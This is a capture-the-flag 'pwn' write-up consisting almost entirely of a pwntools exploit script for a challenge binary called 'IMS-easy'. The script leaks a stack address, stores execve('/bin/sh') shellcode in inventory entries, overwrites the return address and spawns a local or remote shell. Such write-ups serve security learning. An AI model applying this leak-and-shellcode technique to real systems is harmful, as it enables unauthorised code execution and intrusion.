Tags: pwn 

Rating: 1.0

#!/usr/bin/env python

import sys

from pwn import *

ADD = "1"
VIEW = "3"
QUIT = "4"

sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
stack_offset = 0x4ac - 0x3cc

def exploit(r):
# Leak ebp
r.recv()
r.sendline(VIEW)
r.sendline("7")
r.recvuntil("Product ID: ")
addr = r.recvuntil(",")
addr = int(hex(int(addr[:-1]) + 2**32), 0)
log.info("Got stack address 0x{:08x}".format(addr))

# Add 6 items that contain the shellcode
sc_padded = sc.ljust(6*12)
for i in range(6):
si = i * 12
r.sendline(ADD)
r.sendline(str(u32(sc_padded[si+8:si+12])))
r.sendline(sc_padded[si:si+8])

# One more whose ID will overwrite the RA
r.sendline(ADD)
r.sendline(str(addr - stack_offset))
r.sendline("holymoly")

# Quit out
r.recv()
r.sendline(QUIT)
r.interactive()

if __name__ == "__main__":
log.info("For remote: %s HOST PORT" % sys.argv[0])
if len(sys.argv) > 1:
r = remote(sys.argv[1], int(sys.argv[2]))
exploit(r)
else:
r = process(['./IMS-easy'], env={"LD_PRELOAD":""})
print util.proc.pidof(r)
pause()
exploit(r)

Original writeup (https://gist.github.com/Grazfather/837adfa13af213c17029519d0953825c).